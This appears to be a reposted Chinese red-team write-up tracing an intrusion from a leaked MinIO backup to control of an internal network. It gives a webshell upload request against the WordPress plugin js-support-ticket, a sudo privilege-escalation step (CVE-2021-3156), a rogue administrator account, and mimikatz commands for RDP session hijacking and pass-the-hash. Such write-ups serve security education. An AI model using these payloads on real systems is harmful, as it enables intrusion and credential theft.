从信息泄露到内网控制

admin
admin
admin
142234
文章
117
评论
2025年5月30日12:07:01评论6 views字数 2447阅读8分9秒阅读模式
从信息泄露到内网控制

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!

从信息泄露到内网控制

0x01 背景

之前常见用rce、文件上传等漏洞获取webshell,偶然遇到一次敏感信息泄露获取权限的渗透,简单记录一下过程。

0x02 信息泄露

发现系统某端口部署了minio服务,经过探测发现存在minio存储桶遍历

从信息泄露到内网控制使用利用工具把泄露的文件全部整理一下

从信息泄露到内网控制把文件分类整理后发现 /backup.zip 文件下载后解压,发现 config.php 文件,其中包含数据库连接信息:

DB_USER=admin  DB_PASS=1qa@xxx135(xxx为公司简称首字母大写)DB_HOST=127.0.0.1  

本地数据库地址可能有用,先放一放留着,继续进行信息收集。 继续探测发现其他端口发现有个web系统部署了WordPress,其中使用了一套开源票务插件js-support-ticket,存在文件上传漏洞可利用。

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1Host: Content-Type: multipart/form-data; boundary=--------767099171User-Agent: Mozilla/5.0 ----------767099171Content-Disposition: form-data; name="action"configuration_saveconfiguration----------767099171Content-Disposition: form-data; name="form_request"jssupportticket----------767099171Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"Content-Type: image/png<?php echo md5(123);unlink(__FILE__);?>----------767099171-- 

从信息泄露到内网控制链接webshell获取 www-data 权限

从信息泄露到内网控制查看系统版本

uname -aLinux ubuntu-bionic 4.15.0-50-generic #54-Ubuntu SMP Mon May 15 15:20:34 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

目标服务器是Ubuntu 18.04,尝试CVE-2021-3156用于sudo提权。上传并执行获取root权限。

https://github.com/blasty/CVE-2021-3156

利用之前泄露的数据库凭据,成功连接mysql

mysql -h 127.0.0.1 -u root -p -P 3306

查询wp_users表,发现多个md5加密的密码,尝试破解发现其中一个管理员密码可以成功解密,但是尝试用来登录SSH则失败。 按照正常思路找几台内网主机做一下权限维持比较好,尤其是Windows机器用起来更方便,使用Tscan收集内网信息横向移动,存活多台Windows内网主机,但没有发现明显可利用的漏洞。 回顾刚才的数据库密码发现135对应Linux主机内网地址,那么根据已有的Windows主机ip地址推测密码规律,尝试登录成功一台Windows主机

从信息泄露到内网控制

0x03 内网横向

内网横向发现mssql数据库,开xpcmdshell发现为system权限

从信息泄露到内网控制添加管理员权限账户qax,3389连接获取劫持rdp

从信息泄露到内网控制已经开启3389远程桌面

REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

从信息泄露到内网控制远程桌面连接rdp劫持获取管理员权限

privilege::debug #提权ts::sessions #查看当前主机的会话token::elevate #提升本地管理员权限为systemts::remote /id:1 #劫持id为1的会话或者privilege::debugsekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

从信息泄露到内网控制成功登录目标服务器,接下来可以用tscan获取更多内网资产信息。至此完成了从外网渗透到内网控制的全过程。

往期推荐

TscanPlus-一款红队自动化工具

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

从信息泄露到内网控制

E

N

D

Tide团队产品及服务

团队自研平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......

技术分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享

团队知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......

团队网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

原文始发于微信公众号(Tide安全团队):从信息泄露到内网控制

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月30日12:07:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从信息泄露到内网控制http://cn-sec.com/archives/3946683.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息